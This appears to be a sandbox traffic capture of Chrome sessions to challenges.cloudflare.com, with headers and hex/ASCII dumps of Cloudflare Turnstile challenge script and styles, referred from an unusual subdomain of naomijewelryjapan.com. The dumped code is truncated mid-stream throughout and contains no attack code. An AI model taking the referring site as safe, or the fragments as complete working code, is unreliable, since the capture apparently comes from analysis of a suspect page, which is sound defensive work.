                                                                                        Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                                        2024-12-24 08:17:50 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                                                        Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                                                        2024-12-24 08:17:50 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                                        Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                                        2024-12-24 08:17:50 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                                        Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                                        2024-12-24 08:17:50 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                                        Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.449762104.18.94.414434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 08:17:49 UTC808OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/obnyp/0x4AAAAAAA34ghPqNBRUmTxK/auto/fbE/normal/auto/ HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-Dest: iframe
                                                                                        Referer: https://5m9sp7.naomijewelryjapan.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-24 08:17:50 UTC1362INHTTP/1.1 200 OK
                                                                                        Date: Tue, 24 Dec 2024 08:17:50 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 26678
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                        content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                        cross-origin-embedder-policy: require-corp
                                                                                        cross-origin-opener-policy: same-origin
                                                                                        cross-origin-resource-policy: cross-origin
                                                                                        origin-agent-cluster: ?1
                                                                                        accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                        critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                        referrer-policy: same-origin
                                                                                        document-policy: js-profiling
                                                                                        2024-12-24 08:17:50 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 36 66 32 38 33 66 61 62 38 30 63 34 36 31 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                        Data Ascii: Server: cloudflareCF-RAY: 8f6f283fab80c461-EWRalt-svc: h3=":443"; ma=86400
                                                                                        2024-12-24 08:17:50 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                        2024-12-24 08:17:50 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                        Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                        2024-12-24 08:17:50 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                        Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                        2024-12-24 08:17:50 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                        Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                        2024-12-24 08:17:50 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                        Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                        2024-12-24 08:17:50 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                        Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                        2024-12-24 08:17:50 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                        Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                        2024-12-24 08:17:50 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                        Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                        2024-12-24 08:17:50 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                        Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.449763104.18.94.414434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 08:17:51 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f6f283fab80c461&lang=auto HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/obnyp/0x4AAAAAAA34ghPqNBRUmTxK/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-24 08:17:51 UTC331INHTTP/1.1 200 OK
                                                                                        Date: Tue, 24 Dec 2024 08:17:51 GMT
                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                        Content-Length: 128431
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f6f284ab95f429e-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-24 08:17:51 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"http
                                                                                        2024-12-24 08:17:51 UTC1369INData Raw: 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65 2e 22 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 22 59 6f 75 72 25 32 30 66 65 65 64 62 61 63 6b 25 32 30 72 65 70 6f 72 74 25 32 30 68 61 73 25 32 30 62 65 65 6e 25 32 30 73 75 63 63 65 73 73 66 75 6c 6c 79 25 32 30 73 75 62 6d 69 74 74 65 64 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f
                                                                                        Data Ascii: only_always_pass":"Testing%20only%2C%20always%20pass.","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_foo
                                                                                        2024-12-24 08:17:51 UTC1369INData Raw: 2c 66 5a 2c 67 30 2c 67 77 2c 67 41 2c 67 42 2c 67 46 2c 67 47 2c 67 48 2c 66 58 2c 66 59 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 37 32 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 37 39 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 35 33 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 37 32 38 29 29 2f 34 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 35 33 30 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 31 34 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 35 39 30 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28 67 49
